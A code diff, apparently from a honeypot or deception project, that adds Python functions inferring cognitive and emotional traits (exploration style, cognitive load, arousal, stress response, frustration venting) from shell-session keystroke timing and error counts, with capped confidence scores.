+        primitive="cognitive.planning_depth",
+        value=verdict,
+        confidence=0.65 if well_sampled else 0.40,
+    )
+
+
+def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.exploration_style`` (methodical / chaotic / targeted).
+
+    Two rates are derived from the sequence of ``first_token_hash``
+    values:
+
+    * repetition rate ``R = 1 - unique / total``;
+    * backtrack rate ``J`` = share of transitions that land on a tool
+      already used earlier in the session but different from the
+      immediately preceding one.
+
+    Verdict, checked in this order:
+
+    * **chaotic** - ``J >= EXPLORATION_CHAOTIC_BACKTRACK_MIN``.
+    * **targeted** - ``R >= EXPLORATION_TARGETED_REP_MIN``.
+    * **methodical** - neither.
+
+    Nothing is emitted for a session without commands. Below
+    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands the observation is
+    still emitted, at confidence 0.40 instead of 0.60.
+    """
+    n = len(ctx.commands)
+    if n == 0:
+        return
+    hashes = [c.first_token_hash for c in ctx.commands]
+    # n > 0 past the guard above, so the ratio is always defined.
+    repetition_rate = 1.0 - (len(set(hashes)) / n)
+
+    # Backtrack: the current hash differs from its immediate predecessor
+    # yet was already seen, i.e. it first appeared at an index < i-1.
+    # Repeating the immediate predecessor is "drilling" and is captured
+    # by repetition_rate instead.
+    seen_before: set[str] = {hashes[0]}
+    backtracks = 0
+    for prev, cur in zip(hashes, hashes[1:]):
+        if cur != prev and cur in seen_before:
+            backtracks += 1
+        seen_before.add(cur)
+    transitions = n - 1
+    backtrack_rate = (backtracks / transitions) if transitions else 0.0
+
+    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
+        value = "chaotic"
+    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
+        value = "targeted"
+    else:
+        value = "methodical"
+
+    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.60
+    yield make_observation(
+        ctx,
+        primitive="cognitive.exploration_style",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.cognitive_load`` (low / medium / high).
+
+    Mean of up to three sub-signals, each within [0, 1]:
+
+    * **chunking** - median coefficient of variation of the
+      intra-command IATs, divided by
+      ``COGNITIVE_LOAD_CHUNKING_REF_CV`` and clipped. Present only when
+      at least one command has a defined CV.
+    * **errors** - fraction of commands with ``errored`` set. Always
+      present once the session has a command.
+    * **pace variability** - CV of the inter-command IATs, divided by
+      ``COGNITIVE_LOAD_PACE_REF_CV`` and clipped. Present only when that
+      CV is defined.
+
+    A sub-signal with no data is *left out* of the mean (it is not
+    counted as 0.0), so the composite is normalised by the number of
+    available components.
+
+    The mean is bucketed: below ``COGNITIVE_LOAD_LOW_MAX`` is ``low``,
+    below ``COGNITIVE_LOAD_MEDIUM_MAX`` is ``medium``, else ``high``.
+    Nothing is emitted for a session without commands. Confidence is
+    0.60, or 0.40 below ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
+    """
+    if not ctx.commands:
+        return
+
+    components: list[float] = []
+
+    # Component A: chunking variance - median within-command CV.
+    per_cmd_cvs = [
+        cv for cv in (_cv(cmd_iats) for cmd_iats in ctx.intra_command_iats)
+        if cv is not None
+    ]
+    if per_cmd_cvs:
+        components.append(
+            _clip01(statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV)
+        )
+
+    # Component B: error rate. A count over the command list divided by
+    # its length is already within [0, 1], so no clipping is needed, and
+    # this component guarantees ``components`` is never empty.
+    components.append(
+        sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
+    )
+
+    # Component C: pace variability - CV of inter-command IATs.
+    pace_cv = _cv(ctx.inter_cmd_iats)
+    if pace_cv is not None:
+        components.append(_clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV))
+
+    load = sum(components) / len(components)
+
+    if load < COGNITIVE_LOAD_LOW_MAX:
+        value = "low"
+    elif load < COGNITIVE_LOAD_MEDIUM_MAX:
+        value = "medium"
+    else:
+        value = "high"
+
+    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        # Composite over soft sub-signals - deliberately kept at a
+        # modest confidence.
+        confidence = 0.60
+    yield make_observation(
+        ctx,
+        primitive="cognitive.cognitive_load",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.inter_command_consistency``.
+
+    Buckets the coefficient of variation (stdev / mean) of the
+    inter-command IATs:
+
+    * ``metronomic`` - CV < ``PAUSE_CV_METRONOMIC_MAX``.
+    * ``bimodal`` - CV >= ``PAUSE_CV_BIMODAL_MIN``. This is a CV-only
+      heuristic; no actual two-peak test is performed.
+    * ``variable`` - everything in between.
+
+    NOTE(review): earlier documentation quoted 0.40 and 1.50 for the two
+    thresholds - confirm against ``_thresholds`` before relying on them.
+
+    Nothing is emitted when the CV is undefined (fewer than two IATs, or
+    a mean that is not positive). Confidence is 0.75, or 0.40 when the
+    session has fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
+    """
+    # Shared helper: returns None exactly when the CV is undefined.
+    cv = _cv(ctx.inter_cmd_iats)
+    if cv is None:
+        return
+    if cv < PAUSE_CV_METRONOMIC_MAX:
+        value = "metronomic"
+    elif cv >= PAUSE_CV_BIMODAL_MIN:
+        value = "bimodal"
+    else:
+        value = "variable"
+    confidence = (
+        0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
+    )
+    yield make_observation(
+        ctx,
+        primitive="cognitive.inter_command_consistency",
+        value=value,
+        confidence=confidence,
+    )
--- a/decnet/profiler/behave_shell/_features/emotional_valence.py
+++ b/decnet/profiler/behave_shell/_features/emotional_valence.py
@@ -0,0 +1,223 @@
+"""``emotional_valence.*`` feature functions (Phase G, soft block).
+
+All four primitives in this module ride a hard 0.5 confidence cap
+(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
+the feature functions, *not* via :func:`make_observation` — sample-size
+honesty may still pull confidence below 0.5.
+
+Step G.5: ``emotional_valence.valence``.
+Step G.6: ``emotional_valence.arousal`` (lands later).
+Step G.7: ``emotional_valence.stress_response`` (lands later).
+Step G.8: ``emotional_valence.frustration_venting`` (lands later).
+"""
+from __future__ import annotations
+
+import statistics
+from typing import Iterator
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features._emit import make_observation
+from decnet.profiler.behave_shell._thresholds import (
+    AROUSAL_BANG_RUN_MIN,
+    AROUSAL_CALM_IAT_S,
+    AROUSAL_CAPS_RUN_MIN,
+    AROUSAL_FAST_IAT_S,
+    AROUSAL_MIN_IATS,
+    EMOTIONAL_VALENCE_CONFIDENCE_CAP,
+    FRUST_VENT_FULL_CONFIDENCE_MIN,
+    FRUST_VENT_MIN_TYPED_CHARS,
+    STRESS_DISTRESS_RATIO_MIN,
+    STRESS_EUSTRESS_RATIO_MIN,
+    STRESS_MIN_ERRORED_WITH_IATS,
+    VALENCE_FULL_CONFIDENCE_MIN,
+    VALENCE_MIN_HITS,
+    VALENCE_MIN_TYPED_CHARS,
+)
+
+
+def _cap_soft(c: float) -> float:
+    """Limit a confidence to ``EMOTIONAL_VALENCE_CONFIDENCE_CAP`` at most."""
+    if EMOTIONAL_VALENCE_CONFIDENCE_CAP < c:
+        return EMOTIONAL_VALENCE_CONFIDENCE_CAP
+    return c
+
+
+def valence(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.valence`` (positive / neutral / negative).
+
+    Compares the positive lexical hits against the combined negative and
+    obscenity hits:
+
+    * ``positive`` - positives outnumber the combined negatives and
+      reach ``VALENCE_MIN_HITS``.
+    * ``negative`` - the combined negatives outnumber the positives and
+      reach ``VALENCE_MIN_HITS``.
+    * ``neutral`` - anything else.
+
+    Nothing is emitted below ``VALENCE_MIN_TYPED_CHARS`` typed letters.
+    Raw confidence is 0.50 from ``VALENCE_FULL_CONFIDENCE_MIN`` typed
+    letters upward and 0.30 below that; it is then passed through
+    ``_cap_soft``.
+    """
+    letters = ctx.typed_letter_count
+    if letters < VALENCE_MIN_TYPED_CHARS:
+        return
+    upbeat = ctx.positive_lex_hits
+    downbeat = ctx.negative_lex_hits + ctx.obscenity_hits
+
+    verdict = "neutral"
+    if upbeat > downbeat and upbeat >= VALENCE_MIN_HITS:
+        verdict = "positive"
+    elif downbeat > upbeat and downbeat >= VALENCE_MIN_HITS:
+        verdict = "negative"
+
+    if letters >= VALENCE_FULL_CONFIDENCE_MIN:
+        raw = 0.50
+    else:
+        raw = 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.valence",
+        value=verdict,
+        confidence=_cap_soft(raw),
+    )
+
+
+def arousal(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.arousal`` (low_calm / medium_engaged /
+    high_agitated).
+
+    Only typing bursts holding at least 3 IATs are considered
+    ("qualifying"). Let ``total`` be the number of IATs across all
+    qualifying bursts.
+
+    ``high_agitated`` when any of these holds:
+
+    * ``ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN``;
+    * ``ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN``;
+    * ``total >= AROUSAL_MIN_IATS`` and the smallest per-burst median
+      IAT is below ``AROUSAL_FAST_IAT_S``.
+
+    ``low_calm`` when, failing that, ``total >= AROUSAL_MIN_IATS`` and
+    the largest per-burst median IAT exceeds ``AROUSAL_CALM_IAT_S``.
+
+    ``medium_engaged`` otherwise.
+
+    Note that the ``AROUSAL_MIN_IATS`` gate applies to the *total* over
+    qualifying bursts, not to any single burst.
+
+    Nothing is emitted when no burst qualifies. Raw confidence is 0.50
+    when ``total >= AROUSAL_MIN_IATS`` and 0.30 otherwise; it is then
+    passed through ``_cap_soft``.
+    """
+    qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
+    if not qualifying:
+        return
+    # Compute each burst's median once and reuse it for both extremes.
+    burst_medians = [statistics.median(b) for b in qualifying]
+    fastest_med = min(burst_medians)
+    slowest_med = max(burst_medians)
+    total_iats = sum(len(b) for b in qualifying)
+    enough_iats = total_iats >= AROUSAL_MIN_IATS
+
+    if (
+        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
+        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
+        or (enough_iats and fastest_med < AROUSAL_FAST_IAT_S)
+    ):
+        value = "high_agitated"
+    elif enough_iats and slowest_med > AROUSAL_CALM_IAT_S:
+        value = "low_calm"
+    else:
+        value = "medium_engaged"
+    raw = 0.50 if enough_iats else 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.arousal",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
+
+
+def stress_response(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.stress_response`` (none /
+    eustress_positive / distress_negative).
+
+    Compares typing pace right after an error with the rest of the
+    session:
+
+    * post-error pool: intra-command IATs of every command whose
+      immediate predecessor errored;
+    * baseline pool: intra-command IATs of all other commands.
+
+    With ``ratio = median(post-error) / median(baseline)``:
+
+    * ``ratio >= STRESS_EUSTRESS_RATIO_MIN`` gives
+      ``eustress_positive`` (slower after errors);
+    * ``ratio <= 1 / STRESS_DISTRESS_RATIO_MIN`` gives
+      ``distress_negative`` (faster after errors);
+    * otherwise ``none``.
+
+    ``none`` is also reported when either pool is empty or the baseline
+    median is not positive. Nothing is emitted for a session without
+    commands. Raw confidence is 0.50 when at least
+    ``STRESS_MIN_ERRORED_WITH_IATS`` post-error commands carried IAT
+    data and 0.30 otherwise; it is then passed through ``_cap_soft``.
+    """
+    commands = ctx.commands
+    if not commands:
+        return
+    intra = ctx.intra_command_iats
+    post_error_iats: list[float] = []
+    baseline_iats: list[float] = []
+    qualifying_errored = 0
+    for i in range(len(commands)):
+        # Tolerate an IAT table shorter than the command list.
+        iats = list(intra[i]) if i < len(intra) else []
+        if i > 0 and commands[i - 1].errored:
+            if iats:
+                qualifying_errored += 1
+                post_error_iats.extend(iats)
+        else:
+            baseline_iats.extend(iats)
+
+    value = "none"
+    if post_error_iats and baseline_iats:
+        med_post = statistics.median(post_error_iats)
+        med_base = statistics.median(baseline_iats)
+        if med_base > 0.0:
+            ratio = med_post / med_base
+            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
+                value = "eustress_positive"
+            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
+                value = "distress_negative"
+    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.stress_response",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
+
+
+def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.frustration_venting`` (none / detected).
+
+    ``detected`` when ``ctx.obscenity_hits`` is at least 1, ``none``
+    otherwise. Nothing is emitted below ``FRUST_VENT_MIN_TYPED_CHARS``
+    typed letters.
+
+    Raw confidence: 0.40 for ``detected``; for ``none`` it is 0.50 once
+    the typed-letter count reaches ``FRUST_VENT_FULL_CONFIDENCE_MIN`` and
+    0.30 below that. The raw figure is then passed through ``_cap_soft``.
+    """
+    letters = ctx.typed_letter_count
+    if letters < FRUST_VENT_MIN_TYPED_CHARS:
+        return
+    vented = ctx.obscenity_hits >= 1
+    if vented:
+        raw = 0.40
+    elif letters >= FRUST_VENT_FULL_CONFIDENCE_MIN:
+        raw = 0.50
+    else:
+        raw = 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.frustration_venting",
+        value="detected" if vented else "none",
+        confidence=_cap_soft(raw),
+    )
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`"""Artifact storage helpers shared between the web router and TTP workers."""`